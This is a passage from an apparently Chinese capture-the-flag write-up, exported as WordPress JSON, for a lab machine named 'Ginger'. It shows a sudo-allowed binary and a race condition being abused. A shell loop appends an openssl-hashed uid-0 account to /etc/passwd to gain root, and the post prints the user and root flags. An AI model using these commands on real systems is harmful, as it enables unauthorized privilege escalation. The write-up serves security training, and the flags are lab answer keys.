data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300891.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619123317796\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">(remote) caroline@ginger:\/home\/caroline$ file \/srv\/code\n\/srv\/code: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=06cba5f9173dbfdccbdca31eb0477b26ed1e27ff, for GNU\/Linux 3.2.0, not stripped\n(remote) caroline@ginger:\/home\/caroline$ crontab -l\n# Edit this file to introduce tasks to be run by cron.\n# \n# Each task to run has to be defined through a single line\n# indicating with different fields when the task will be run\n# and what command to run for the task\n# \n# To define the time you can provide concrete values for\n# minute (m), hour (h), day of month (dom), month (mon),\n# and day of week (dow) or use &#039;*&#039; 
in these fields (for &#039;any&#039;).\n# \n# Notice that tasks will be started based on the cron&#039;s system\n# daemon&#039;s notion of time and timezones.\n# \n# Output of the crontab jobs (including errors) is sent through\n# email to the user the crontab file belongs to (unless redirected).\n# \n# For example, you can run a backup of all your user accounts\n# at 5 a.m every week with:\n# 0 5 * * 1 tar -zcf \/var\/backups\/home.tgz \/home\/\n# \n# For more information see the manual pages of crontab(5) and cron(8)\n# \n# m h  dom mon dow   command\n\n* * * * * bash ~\/backup\/backup.sh<\/code><\/pre>\n<p>Sure enough, it is a scheduled task.<\/p>\n<h3>Race-Condition Escalation to root<\/h3>\n<pre><code class=\"language-bash\">(remote) caroline@ginger:\/home\/caroline$ ls -la\ntotal 40\ndrwxr-xr-- 5 caroline webmaster 4096 May 25  2021 .\ndrwxr-xr-x 5 root     root      4096 May 21  2021 ..\ndrwxrwx--- 2 caroline webmaster 4096 Jun 19 06:32 backup\nlrwxrwxrwx 1 root     root         9 May 25  2021 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 caroline caroline   220 May 21  2021 .bash_logout\n-rw-r--r-- 1 caroline caroline  3526 May 21  2021 .bashrc\ndrwx------ 3 caroline caroline  4096 May 22  2021 .gnupg\ndrwxr-xr-x 3 caroline caroline  4096 May 21  2021 .local\n-rw-r--r-- 1 caroline caroline   807 May 21  2021 .profile\n-rw-r--r-- 1 caroline caroline    66 May 21  2021 .selected_editor\n-rwx------ 1 caroline caroline    33 May 22  2021 user.txt\n(remote) caroline@ginger:\/home\/caroline$ cat user.txt \nf65aaadaeeb04adaccba45d7babf5f8c\n(remote) caroline@ginger:\/home\/caroline$ sudo -l\nMatching Defaults entries for caroline on ginger:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser caroline may run the following commands on ginger:\n    (ALL : ALL) NOPASSWD: \/srv\/code<\/code><\/pre>\n<p>Download it locally for analysis:<\/p>\n<p><div 
class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300892.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300892.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619123827148\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300893.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300893.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619123850391\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>This is dancing wildly on the edge of danger; just try to win the race and write to the file:<\/p>\n<pre><code class=\"language-bash\">(remote) caroline@ginger:\/home\/caroline$ cat \/etc\/passwd | grep root\nroot:x:0:0:root:\/root:\/bin\/bash\n(remote) caroline@ginger:\/home\/caroline$ printf &quot;kali:$(openssl passwd -1):0:0:root:\/root:\/bin\/bash&quot;\nPassword: \nVerifying - Password: 
\nkali:$1$8sVzWutt$M10cgy87.pU\/kWXId8Iiy\/:0:0:root:\/root:\/bin\/bash<\/code><\/pre>\n<p>Try writing:<\/p>\n<pre><code class=\"language-bash\">while true; do echo &#039;kali:$1$8sVzWutt$M10cgy87.pU\/kWXId8Iiy\/:0:0:root:\/root:\/bin\/bash&#039; &gt;&gt; \/etc\/passwd 2&gt;\/dev\/null; sleep 3; tail -n 1 \/etc\/passwd; done<\/code><\/pre>\n<p>On the other side, just start the program:<\/p>\n<pre><code class=\"language-bash\">(remote) caroline@ginger:\/home\/caroline$ sudo \/srv\/code<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300894.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300894.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619125731850\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300895.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300895.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619125741352\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u5207\u6362\u7528\u6237\uff0c\u6210\u529f\uff01<strong>PS:\u672a\u8bbe\u7f6e\u5bc6\u7801\u9ed8\u8ba4\u5c31\u662f\u7a7a\u5bc6\u7801\uff0c\u76f4\u63a5\u56de\u8f66\u5373\u53ef<\/strong><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300896.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300896.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619125942818\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">root@ginger:\/home\/caroline# whoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root)\nroot@ginger:\/home\/caroline# cd \/root\nroot@ginger:~# ls -la\ntotal 40\ndrwx------  5 root root 4096 Jun  2  2021 .\ndrwxr-xr-x 18 root root 4096 May 19  2021 ..\nlrwxrwxrwx  1 root root    9 May 25  2021 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc\ndrwx------  3 root root 4096 May 21  2021 .cache\ndrwx------  3 root root 4096 May 21  2021 .gnupg\ndrwxr-xr-x  3 root root 4096 May 22  2021 .local\n-rw-------  1 root root 1563 Jun  2  2021 .mysql_history\n-rw-r--r--  1 root root  149 May 21  2021 .profile\n-rwx------  1 root root   33 May 22  2021 root.txt\n-rw-r--r--  1 root root   66 May 
21  2021 .selected_editor\nroot@ginger:~# cat root.txt \nae426c9d237d676044e5cd8e8af9ef7f<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Ginger Information gathering Port scanning \u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Ginger] \u2514\u2500$ rus [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-893","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/893","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=893"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/893\/revisions"}],"predecessor-version":[{"id":894,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/893\/revisions\/894"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=893"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=893"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=893"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}